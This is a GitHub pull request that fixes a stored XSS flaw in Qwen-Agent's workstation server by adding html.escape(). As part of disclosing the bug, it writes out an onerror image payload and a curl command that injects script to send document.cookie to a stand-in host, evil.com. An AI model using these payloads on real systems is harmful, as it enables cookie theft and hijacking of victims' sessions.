Skip to content

fix: escape HTML in workstation browsing history to prevent stored XSS (CWE-79)#846

Open
sebastiondev wants to merge 1 commit intoQwenLM:mainfrom
sebastiondev:fix/cwe79-workstation_server
Open

fix: escape HTML in workstation browsing history to prevent stored XSS (CWE-79)#846
sebastiondev wants to merge 1 commit intoQwenLM:mainfrom
sebastiondev:fix/cwe79-workstation_server

Conversation

@sebastiondev
Copy link
Copy Markdown

Vulnerability Summary

CWE-79: Stored Cross-Site Scripting (XSS) in qwen_server/workstation_server.py
Severity: High (stored XSS, no authentication required)

Data Flow

  1. Source: Attacker-controlled url and title values are written to meta_data.jsonl via:
    • database_server.cache_page() — unauthenticated POST to /endpoint (port 7866)
    • workstation_server.add_file() — Gradio file upload
  2. Sink: update_browser_list() (line ~162) interpolates these values directly into an HTML string using .format(), which is then rendered by Gradio's gr.HTML component.
  3. No sanitization existed between source and sink.

Additionally, get_basename_from_url() URL-decodes percent-encoded characters, so a URL like http://evil.com/%3Cimg%20src=x%20onerror=alert(1)%3E produces the title <img src=x onerror=alert(1)>.

Exploit Scenarios

Vector 1 — Chrome Extension (social engineering):

  1. Attacker hosts a page at a URL containing a percent-encoded XSS payload
  2. Victim visits the page and clicks "Add to Qwen's Reading List" (the Chrome extension)
  3. The extension sends the URL to database_server, which URL-decodes it into meta_data.jsonl
  4. When the victim opens the Workstation, the payload renders via gr.HTML → XSS fires

Vector 2 — Direct POST (network access required):

curl -X POST http://TARGET:7866/endpoint \
  -H "Content-Type: application/json" \
  -d '{"task":"cache","url":"<img src=x onerror=fetch(\"http://evil.com/steal?\"+document.cookie)>","content":"test"}'

Fix Description

Change: Added html.escape() calls for both url (with quote=True for attribute context) and title before HTML interpolation in update_browser_list().

Rationale:

  • html.escape() is the standard Python library function for neutralizing HTML metacharacters (<, >, &, ", ')
  • quote=True on the URL ensures the id="ck-..." and href="..." attribute contexts are also safe
  • The fix is minimal (1 new import, 3 changed lines) and does not alter any functional behavior
  • No dependencies are added

Diff: 1 file changed, 5 insertions, 2 deletions.


Test Results Summary

The fix was verified by tracing the code path:

  • Before fix: x[0] and x[1] from meta_data.jsonl are interpolated directly into HTML → <img src=x onerror=alert(1)> renders as live HTML
  • After fix: html.escape(x[0], quote=True) and html.escape(x[1]) convert <&lt;, >&gt;, "&quot; → payload renders as inert text

Disprove Analysis

We systematically attempted to invalidate this finding:

Check Result
Authentication ❌ None. The api_key is for DashScope (LLM backend), not for user auth. Neither the Gradio nor FastAPI server authenticates clients.
Network binding ⚠️ Default 127.0.0.1, but 0.0.0.0 is documented and encouraged for multi-machine setups. Chrome extension path bypasses localhost restriction entirely.
CORS ⚠️ Database server restricts CORS origins, but Chrome extensions and direct HTTP clients (curl) bypass CORS.
innerHTML script limitation ⚠️ <script> tags don't execute via innerHTML per HTML5 spec, but event handlers (onerror, onload) DO execute.
Input validation ❌ No sanitize, escape, validate, clean, or allowlist calls existed in the original code path.
Prior reports Issue #810 reports the exact same XSS pattern in gradio_utils.py — confirming this is an acknowledged vulnerability class in the project.
Security policy ❌ No SECURITY.md found.
Recent hardening ❌ Only 2 commits on this file (original creation + this fix). No prior security work.

Verdict: CONFIRMED VALID (high confidence)

No existing mitigation fully prevents exploitation. The Chrome extension attack vector bypasses both localhost binding and CORS restrictions, requires no special network access, and needs only a single click from the victim.


Known Limitations (for follow-up)

  1. javascript: URI scheme: html.escape() does not prevent javascript: URIs in the href attribute. A URL-scheme allowlist would be a stronger defense.
  2. Checkbox ID stability: After escaping, the id="ck-..." attribute uses the escaped URL, which may differ from the raw URL used elsewhere. This is a pre-existing design concern, not introduced by this fix.
  3. Related issue: #810 describes the same XSS pattern in qwen_agent/gui/gradio_utils.py — that file is not addressed by this PR.

…d XSS (CWE-79)

The update_browser_list() function interpolated title and url values from
meta_data.jsonl directly into an HTML string without escaping. An attacker
who controls a browsing entry title (via the browser extension or by writing
to the meta_data file) could inject arbitrary HTML/JavaScript into the
Gradio web UI.

Fix: apply html.escape() to both title and url before interpolation into
the HTML template string.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant